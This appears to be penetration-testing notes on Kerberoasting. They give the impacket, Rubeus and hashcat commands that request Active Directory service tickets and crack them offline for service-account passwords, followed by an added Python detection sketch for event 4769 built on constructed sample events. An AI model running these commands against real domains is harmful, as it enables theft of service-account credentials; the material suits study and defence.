
Kerberoasting

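The client requests a service ticket for an SPN, and the domain controller generates it. Part of the ticket is encrypted with a key derived from the service account's password, so if we can crack the ticket offline we get the password of the service account.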

Remote

Credentials are needed.

sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete

Local

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Cracking

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt
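
Detection

Added example, not part of the original notes: a Python sketch of how a defender can spot this activity in domain controller Security event 4769 ("A Kerberos service ticket was requested") by flagging one requester that pulls RC4 (etype 0x17, the type hashcat mode 13100 cracks) tickets for several user-account services. The sample events, the service account names, the client addresses and the threshold of 3 are constructed assumptions.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the ticket type hashcat mode 13100 targets


def _ev(user, service, etype, status="0x0", ip="::ffff:192.168.50.75"):
    """Build one flattened 4769 record (constructed sample data)."""
    return {"TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status, "IpAddress": ip}


# Constructed sample: service names and client IPs are invented for the demo.
SAMPLE_EVENTS = [
    _ev("pete@CORP.COM", "iis_service", "0x17"),
    _ev("pete@CORP.COM", "sql_service", "0x17"),
    _ev("pete@CORP.COM", "backup_svc", "0x17"),
    _ev("pete@CORP.COM", "FILES04$", "0x12"),                      # machine account, AES
    _ev("jen@CORP.COM", "sql_service", "0x12", ip="::ffff:192.168.50.80"),
    _ev("jen@CORP.COM", "iis_service", "0x17", ip="::ffff:192.168.50.80"),
    _ev("dave@CORP.COM", "sql_service", "0x17", status="0x6"),     # failed request
]


def is_roastable_request(ev):
    """True for a successful RC4 ticket request against a user-account service."""
    svc = ev["ServiceName"]
    if ev["Status"] != "0x0":
        return False
    # Machine accounts (trailing $) and krbtgt have long random keys: not crackable.
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    # Only RC4 is checked here; AES tickets (0x11, 0x12) are out of scope.
    return int(ev["TicketEncryptionType"], 16) == RC4_HMAC


def find_kerberoast_suspects(events, min_services=3):
    """Map (account, client IP) -> sorted services for requesters that pulled
    RC4 tickets for at least min_services distinct service accounts."""
    seen = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            seen[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_services}


if __name__ == "__main__":
    for (acct, ip), services in find_kerberoast_suspects(SAMPLE_EVENTS).items():
        print(f"{acct} from {ip}: RC4 tickets for {', '.join(services)}")
```
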